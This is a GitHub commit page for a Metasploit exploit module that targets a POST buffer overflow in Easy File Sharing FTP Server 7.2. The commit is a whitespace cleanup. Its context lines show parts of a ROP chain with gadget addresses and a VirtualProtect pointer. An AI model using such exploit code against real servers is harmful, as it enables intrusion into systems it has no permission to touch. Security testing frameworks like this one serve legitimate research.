Skip to content

Commit 7fb36ed

Browse files
committed
corrected msftidy warnings
1 parent 31a5cc9 commit 7fb36ed

File tree

1 file changed

+2
-3
lines changed

1 file changed

+2
-3
lines changed

modules/exploits/windows/http/easyfilesharing_post.rb

Lines changed: 2 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -16,11 +16,11 @@ def initialize(info = {})
1616
'Description' => %q{
1717
This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
1818
},
19-
'Author' =>
19+
'Author' =>
2020
[
2121
'bl4ck h4ck3r', #POC
2222
'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
23-
],
23+
],
2424
'License' => MSF_LICENSE,
2525
'References' =>
2626
[
@@ -57,7 +57,6 @@ def create_rop_chain
5757
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
5858
0x10015442, # POP EAX # RETN [ImageLoad.dll]
5959
0x1004de84, # &Writable location [ImageLoad.dll]
60-
6160
0x10015442, # POP EAX # RETN [ImageLoad.dll]
6261
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
6362
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]

0 commit comments

Comments
 (0)